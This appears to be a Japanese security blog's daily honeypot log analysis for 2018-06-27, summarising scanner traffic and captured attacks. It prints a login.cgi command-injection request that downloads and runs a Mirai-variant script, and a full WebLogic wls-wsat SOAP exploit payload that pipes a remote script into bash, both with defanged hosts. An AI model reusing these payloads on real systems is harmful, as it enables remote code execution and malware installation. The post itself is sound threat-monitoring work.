S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypot簡易分析(24日目)

WOWHoneypot簡易分析(24日目)

honeypot

WOWhoneypotの2018/6/27(水)(運用24日目)の簡易分析です。

本日の総アクセス件数は170件です。

37 [2018-06-27 "GET /
34 [2018-06-27 "HEAD /
2 [2018-06-27 "GET /xampp/phpmyadmin/index.php
2 [2018-06-27 "GET /www/phpMyAdmin/index.php
2 [2018-06-27 "GET /web/phpMyAdmin/index.php
2 [2018-06-27 "GET /typo3/phpmyadmin/index.php
2 [2018-06-27 "GET /tools/phpMyAdmin/index.php
2 [2018-06-27 "GET /pmd/index.php
2 [2018-06-27 "GET /pma-old/index.php
2 [2018-06-27 "GET /pmamy/index.php
2 [2018-06-27 "GET /pmamy2/index.php
2 [2018-06-27 "GET /PMA/index.php
2 [2018-06-27 "GET /pma/index.php
2 [2018-06-27 "GET /PMA2/index.php
2 [2018-06-27 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-27 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-27 "GET /phpMyAdminold/index.php
2 [2018-06-27 "GET /phpMyAdmin.old/index.php
2 [2018-06-27 "GET /phpmyadmin-old/index.php
2 [2018-06-27 "GET /phpMyAdmin/index.php
2 [2018-06-27 "GET /phpmyadmin/index.php
2 [2018-06-27 "GET /phpMyadmin_bak/index.php
2 [2018-06-27 "GET /phpmyadmin2/index.php
2 [2018-06-27 "GET /phpmyadmin1/index.php
2 [2018-06-27 "GET /phpmyadmin0/index.php
2 [2018-06-27 "GET /phpadmin/index.php
2 [2018-06-27 "GET /mysql/index.php
2 [2018-06-27 "GET /mysqladmin/index.php
2 [2018-06-27 "GET /mysql-admin/index.php
2 [2018-06-27 "GET /myadmin/index.php
2 [2018-06-27 "GET /myadmin2/index.php
2 [2018-06-27 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
2 [2018-06-27 "GET /index.php
2 [2018-06-27 "GET /db/index.php
2 [2018-06-27 "GET /dbadmin/index.php
2 [2018-06-27 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-27 "GET /admin/PMA/index.php
2 [2018-06-27 "GET /admin/pma/index.php
2 [2018-06-27 "GET /admin/phpMyAdmin/index.php
2 [2018-06-27 "GET /admin/phpmyadmin/index.php
2 [2018-06-27 "GET /admin/phpmyadmin2/index.php
2 [2018-06-27 "GET /admin/mysql/index.php
2 [2018-06-27 "GET /admin/mysql2/index.php
2 [2018-06-27 "GET /admin/index.php
1 [2018-06-27 "PROPFIND /
1 [2018-06-27 "POST /xx.php
1 [2018-06-27 "POST /xw.php
1 [2018-06-27 "POST /wuwu11.php
1 [2018-06-27 "POST /w.php
1 [2018-06-27 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-27 "POST /s.php
1 [2018-06-27 "POST /sheep.php
1 [2018-06-27 "POST /db_session.init.php
1 [2018-06-27 "POST /db.init.php
1 [2018-06-27 "GET /.well-known/security.txt
1 [2018-06-27 "GET /webdav/
1 [2018-06-27 "GET /sitemap.xml
1 [2018-06-27 "GET /robots.txt
1 [2018-06-27 "GET /favicon.ico

例によってPhpMyAdmin関連(1IPから82件)と/を除外します。青字はこれまでに分析済のものです。

2 [2018-06-27 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-27 "POST /xx.php
1 [2018-06-27 "POST /xw.php
1 [2018-06-27 "POST /wuwu11.php
1 [2018-06-27 "POST /w.php
1 [2018-06-27 "POST /s.php
1 [2018-06-27 "POST /sheep.php
1 [2018-06-27 "POST /db_session.init.php
1 [2018-06-27 "POST /db.init.php
1 [2018-06-27 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-27 "GET /webdav/
1 [2018-06-27 "GET /.well-known/security.txt
1 [2018-06-27 "GET /sitemap.xml
1 [2018-06-27 "GET /robots.txt
1 [2018-06-27 "GET /favicon.ico

新たに来ていたものは一連です。ありそうなファイルを探してサイトの構成を探っているものと思われます。

GET / HTTP/1.1
Accept-Encoding: identity
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36

GET /robots.txt HTTP/1.1
Accept-Encoding: identity

GET /sitemap.xml HTTP/1.1
Accept-Encoding: identity

GET /.well-known/security.txt HTTP/1.1
Accept-Encoding: identity

GET /favicon.ico HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.13.0

既知のものですが、Weblogic脆弱性を突く攻撃のペイロードが異なったものが来ていました。アクターが別と思われます。Linux向けの攻撃のためUser-Agentに識別子としてOSを入れており、それによりログから脆弱なIPを調べると思われます。

POST /wls-wsat/CoordinatorPortType HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 771
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>/bin/sh</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget --user-agent ""linux"" -O - hxxp://107.181.174[.]232/lin/st.sh | bash</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

 

本日のハンティングログです。Mirai亜種とWeblogic脆弱性をつくものです。

2 [2018-06-27 wget hxxp://185.62.190[.]191/r
1 [2018-06-27 wget --user-agent ""linux"" -O - hxxp://107.181.174[.]232/lin/st.sh

 

以上です。